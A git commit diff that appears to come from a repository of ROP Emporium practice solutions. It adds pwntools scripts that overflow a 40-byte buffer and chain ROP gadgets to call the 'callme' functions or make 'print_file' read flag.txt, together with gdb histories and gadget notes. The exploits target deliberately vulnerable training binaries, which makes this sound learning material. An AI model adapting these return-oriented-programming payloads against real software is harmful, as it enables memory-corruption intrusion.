new file: x86_64/write4/exploit.py

new file: x86_64/write4/useful_gadgets
2020-12-16 17:45:09 -06:00 · 2020-12-16 17:45:09 -06:00 · 3f0a1e64c7
commit 3f0a1e64c7
parent 2ddedfeb91
8 changed files with 304 additions and 0 deletions
--- a/x86_64/callme/.gdb_history
+++ b/x86_64/callme/.gdb_history
@ -0,0 +1,12 @@
+break pwnme
+run
+stepi
+return
+stepi
+nexti
+nexti
+q
+break pwnme
+run
+nexti
+quit
--- a/x86_64/callme/exploit2.py
+++ b/x86_64/callme/exploit2.py
@ -0,0 +1,55 @@
+#!/usr/bin/env python3
+from pwn import *
+
+usefulGadgets = p64(0x000000000040093c)
+#   pop rdi
+#   pop rsi
+#   pop rdx
+#   ret
+
+arg1 = p64(0xdeadbeefdeadbeef)
+arg2 = p64(0xcafebabecafebabe)
+arg3 = p64(0xd00df00dd00df00d)
+
+callme_1_plt = p64(0x0000000000400720)
+callme_2_plt = p64(0x0000000000400740)
+callme_3_plt = p64(0x00000000004006f0)
+
+#jmp qword ptr [rbp]
+#jmp rax
+#jmp qword ptr [rax]
+#pop rbp ; ret
+
+#pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret <- change stack pointer to fin (or some other writable executable part)
+
+
+prog = process('./callme')
+payload = b''
+for c in range(40):
+    payload += b'a'
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_1_plt
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_2_plt
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_3_plt
+
+
+
+
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))
--- a/x86_64/write4/.exploit.py.swp
+++ b/x86_64/write4/.exploit.py.swp
--- a/x86_64/write4/.gdb_history
+++ b/x86_64/write4/.gdb_history
@ -0,0 +1,197 @@
+run < stest
+exit
+quit
+break pwnme
+run
+context
+nexti
+quit
+exit
+quit
+quit
+continue
+nexti
+break pwnme+133
+break *pwnme+133
+nexti
+nexti
+nexti
+exit
+quit
+quit
+continue
+quit
+continue
+q
+continue
+quit
+continue
+context
+nexti
+quit
+q
+nexti
+continue
+nexti
+nexti
+stepi
+info reg
+context
+stepi
+exit
+quit
+quit
+exit
+quit
+quit
+exit
+quit
+quit
+quit
+continue
+info reg
+q
+continue
+context
+stepi
+stepi
+continue
+context
+continue
+quit
+continue
+context
+continue
+nexti
+stepi
+quit
+continue
+context
+stepi
+return
+stepi
+ret
+return
+continue
+quit
+continue
+break print_file
+continue
+break print_file
+continue
+stepi
+nexti
+info reg
+context
+print errno 
+stepi
+nexti
+continue
+q
+continue
+context
+stepi
+info reg
+context
+nexti
+info reg
+q
+continue
+context
+q
+continue
+context
+continue
+stepi
+return
+context
+nexti
+stepi
+continue
+q
+continue
+quit
+continue
+continue
+nexti
+quit
+quit
+continue
+context
+stepi
+info reg
+context
+q
+continue
+continue
+q
+continue
+context
+continue
+quit
+continue
+context
+continue
+nexti
+stepi
+info reg r14
+stepi
+info reg r14
+stepi
+info reg r15
+stepi
+quit
+cotinue
+continue
+context
+continue
+continue
+q
+run
+continue
+context
+continue
+continue
+q
+continue
+nexti
+stepi
+info reg r14
+info reg r15
+x/x $r14
+stepi
+x/x $r14
+stepi
+x/x $r14
+stepi
+quit
+continue
+stepi
+return
+nexti
+stepi
+quit
+continue
+nexti
+nexti
+stepi
+continue
+quit
+stepi
+continue
+stepi
+nexti
+print .init_array
+x 0x0000000000600df0 + 0x00000df0
+x/s 0x0000000000600df0 + 0x00000df0
+quit
+continue
+stepi
+info reg
+q
+continue
+stepi
+stepi
+stepi
+stepi
+quit
--- a/x86_64/write4/.useful_gadgets.swp
+++ b/x86_64/write4/.useful_gadgets.swp
--- a/x86_64/write4/exploit.py
+++ b/x86_64/write4/exploit.py
@ -0,0 +1,19 @@
+#!/usr/bin/env python3
+from pwn import *
+
+prog = process('./write4')
+payload = b''
+for c in range(40):
+    payload += b'a'
+
+payload += p64(0x0000000000400690)                  # pop r14, pop r15, ret
+payload += p64(0x0000000000600df0 + 0x00000df0)     # addr of init_array section
+payload += b"flag.txt"                              # our string (duh)
+payload += p64(0x0000000000400628)                  # mov qword ptr [r14], r15 ; ret 
+payload += p64(0x0000000000400693)                  # pop rdi; ret
+payload += p64(0x0000000000600df0 + 0x00000df0)     # addr of init_array section
+payload += p64(0x0000000000400510)                  # print_file@plt
+payload += b"\n"
+prog.sendline(payload)
+print(str(prog.recv(), 'UTF-8'))
+prog.close()
--- a/x86_64/write4/stest
+++ b/x86_64/write4/stest
@ -0,0 +1,2 @@
+	
+
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcd
--- a/x86_64/write4/useful_gadgets
+++ b/x86_64/write4/useful_gadgets
@ -0,0 +1,19 @@
+0x000000000040068d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
+
+0x0000000000400690 : pop r14 ; pop r15 ; ret
+0x0000000000400628 : mov qword ptr [r14], r15 ; ret
+
+0x000000000040069) : pop rdi; ret
+
+
+
+
+
+0x0000000000400510 : print_file@plt 
+0x0000000000600df0 : addr of init array
+
+we should write to .init_array .fini_array
+
+
+
+
				`@ -0,0 +1,2 @@`

				!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcd